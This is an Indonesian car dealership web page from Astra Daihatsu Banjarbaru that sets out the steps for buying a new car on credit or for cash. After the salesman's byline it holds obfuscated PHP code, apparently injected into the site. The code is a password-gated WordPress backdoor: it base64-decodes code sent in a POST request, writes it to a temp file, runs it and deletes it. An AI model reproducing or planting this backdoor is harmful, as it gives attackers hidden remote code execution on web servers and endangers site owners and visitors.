~ Saya Hasanuddin Ahman, marketing senior Astra Daihatsu Banjarbaru Kalimantan Selatan~ Dapatkan Promo Spesial pembelian dari Website ini~ Harga Pabrik, Diskon Besar, Ready Unit All Type
Beranda » Alur Proses Pembelian Mobil Baru

Alur Proses Pembelian Mobil Baru

Proses Pembelian Mobil Baru Secara Kredit

Berikut adalah langkah-langkah umum yang terkait dengan pengajuan kredit mobil baru:

  1. Mengumpulkan informasi: Pertama-tama, Anda harus mengumpulkan informasi yang diperlukan untuk mengajukan kredit mobil. Ini meliputi dokumen pribadi seperti KTP, kartu keluarga, NPWP, slip gaji terbaru, buku tabungan/rekening koran, bukti kepemilikan rumah (rekening listrik/rekening air/pajak bumi bangunan (PBB), dan liannya), dan informasi lain yang mungkin diminta oleh lembaga pembiayaan.
  2. Mengisi Formulir SPK: Selanjutnya setelah mengumpulkan berkas, Anda perlu mengisi formulir Surat Pemesanan Kendaraan (SPK) untuk mengajukan proses survey kredit, diskon, penyiapan unit dan berkas lainnya. Dengan membayar tanda jadi maksimal 2 juta rupiah, Bisa melalui transfer ke rekening perusahaan atau melalui pihak marketing/salesman.
  3. Survey Kredit: Setelah mengisi formulir SPK, Anda akan ditelpon oleh pihak pembiayaan untuk mengkonfirmasi pengajuan kredit dan mengatur jadwal survey kelokasi rumah anda. Pada saat survey, Pihak surveyor akan meminta informasi pribadi Anda, informasi pekerjaan, rincian penghasilan, dan detail lainĀ  dab berkas yang diperlukan untuk mengevaluasi kelayakan Anda sebagai peminjam.
  4. Analisa penilaian kredit: Setelah Anda mengajukan permohonan dan disurvey, lembaga pembiayaan akan melakukan analisa kredit untuk menentukan kelayakan Anda sebagai peminjam. Mereka akan memeriksa riwayat kredit Anda, kemampuan pembayaran, dan faktor-faktor lain yang mempengaruhi keputusan mereka.
  5. Persetujuan kredit: Jika Anda memenuhi persyaratan kredit dan penilaian kredit Anda diterima, lembaga pembiayaan akan memberikan persetujuan kredit. Ini berarti bahwa mereka menyetujui pengajuan kredit mobil baru Anda dan siap untuk melanjutkan proses lebih lanjut. Dengan bukti keluarnya surat Purchase Order (PO).
  6. Penandatanganan perjanjian: Setelah persetujuan kredit diberikan, Anda akan diminta untuk menandatangani perjanjian kredit. Perjanjian ini akan memuat rincian tentang jumlah pinjaman, suku bunga, jangka waktu pinjaman, dan persyaratan lain yang terkait dengan kredit mobil Anda.
  7. Pelunasan uang muka/DP : Setelah Penandatanganan perjanjian, Anda akan diminta untuk melakukan pembayaran pelunasan uang muka/DP disertai lampiran surat Purchase Order (PO), untuk masuk proses administrasi, pengecekan berkas keluar unit, dan persiapan mobil baru agar bisa anda terima.

Harap dicatat bahwa alur proses pengajuan kredit mobil dapat bervariasi tergantung pada lembaga pembiayaan yang Anda pilih dan persyaratan spesifik yang mereka tetapkan.

 

Proses Pembelian Mobil Baru Secara Cash

Berikut adalah langkah-langkah umum yang terkait dengan pembelian cash mobil baru:

  1. Mengumpulkan informasi: Pertama-tama, Anda harus mengumpulkan informasi yang diperlukan untuk mengajukan kredit mobil. Ini meliputi dokumen pribadi seperti KTP, kartu keluarga, dan NPWP.
  2. Mengisi Formulir SPK: Selanjutnya setelah mengumpulkan berkas, Anda perlu mengisi formulir Surat Pemesanan Kendaraan (SPK) untuk mengajukan diskon, penyiapan unit dan berkas lainnya. Dengan membayar tanda jadi maksimal 2 juta rupiah, Bisa melalui transfer ke rekening perusahaan atau melalui pihak marketing/salesman.
  3. Pelunasan : Setelah Penandatanganan perjanjian, Anda akan diminta untuk melakukan pembayaran pelunasan, untuk masuk proses administrasi, pengecekan berkas keluar unit, dan persiapan mobil baru agar bisa anda terima.

Harap dicatat pastikan unit yang anda inginkan, model, warna, dan type mobilnya ready gudang.

Bagikan ke
Hasanudin Ahmad
Senior Sales Executive
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}